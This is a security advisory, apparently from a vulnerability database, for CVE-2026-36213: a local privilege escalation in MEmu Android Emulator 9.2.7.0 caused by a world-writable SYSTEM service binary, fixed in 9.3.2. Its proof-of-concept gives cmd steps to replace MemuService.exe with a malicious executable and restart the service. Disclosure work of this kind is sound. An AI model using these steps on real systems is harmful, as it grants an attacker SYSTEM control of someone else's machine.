📄 MEmu Android Emulator 9.2.7.0 Privilege Escalation

🗓️ 11 Jun 2026 00:00:00Reported by Mohammad Hossein Ashofte YazdiType

Local privilege escalation in MEmu Emulator 9.2.7.0 via insecure MemuService.exe; fixed in 9.3.2.

# CVE-2026-36213
    CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2
    # CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE
    
    ![CVE](https://img.shields.io/badge/CVE-2026--36213-red)
    ![CVSS](https://img.shields.io/badge/CVSS-7.8%20HIGH-orange)
    ![Status](https://img.shields.io/badge/Patched-9.3.2-green)
    ![Platform](https://img.shields.io/badge/Platform-Windows-blue)
    
    ## Summary
    
    A Local Privilege Escalation (LPE) vulnerability in **MEmu Android Emulator 9.2.7.0**.  
    The service `MEmuSVC` runs as `NT AUTHORITY\SYSTEM` while its binary is writable by any local user, allowing full system compromise.
    
    | Field | Details |
    |-------|---------|
    | **CVE** | CVE-2026-36213 |
    | **Product** | MEmu Android Emulator (MicroVirt) |
    | **Affected Version** | 9.2.7.0 and earlier |
    | **Fixed Version** | 9.3.2 |
    | **CWE** | CWE-732 / CWE-269 |
    | **CVSS v3.1** | 7.8 HIGH `AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
    | **ATT&CK** | [T1574.010](https://attack.mitre.org/techniques/T1574/010/) |
    
    ---
    
    ## Vulnerability
    
    `MEmuService.exe` is installed as a SYSTEM-level Windows service with insecure NTFS permissions:
    
    ```cmd
    icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
    
    BUILTIN\Users:(F)   ← Any local user has Full Control
    Everyone:(F)        ← World-writable binar
    ```
    ## Proof of Concept
    :: Step 1 - Verify vulnerable permissions
    ```cmd
    icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
    ```
    
    :: Step 2 - Replace binary (as low-priv user)
    ```cmd
    copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y
    ```
    
    :: Step 3 - Restart service
    ```cmd
    sc stop MEmuSVC && sc start MEmuSVC
    ```
    
    :: Result: malicious.exe runs as NT AUTHORITY\SYSTEM
    
    ## Detection Script
    Available at: https://github.com/sec-zone/Hijack-service-binaries
    
    ## Disclaimer
    This research was conducted for educational purposes under responsible disclosure policy.  
    The author is not responsible for any misuse of this information.
    
    ## Researcher
    Name: Mohammad Hossein Ashofte Yazdi  
    Linkedin: https://www.linkedin.com/in/seczone64  
    Twitter: @sec_zone64  
    Email: [email protected]

11 Jun 2026 00:00Current

5.4Medium risk

Vulners AI Score5.4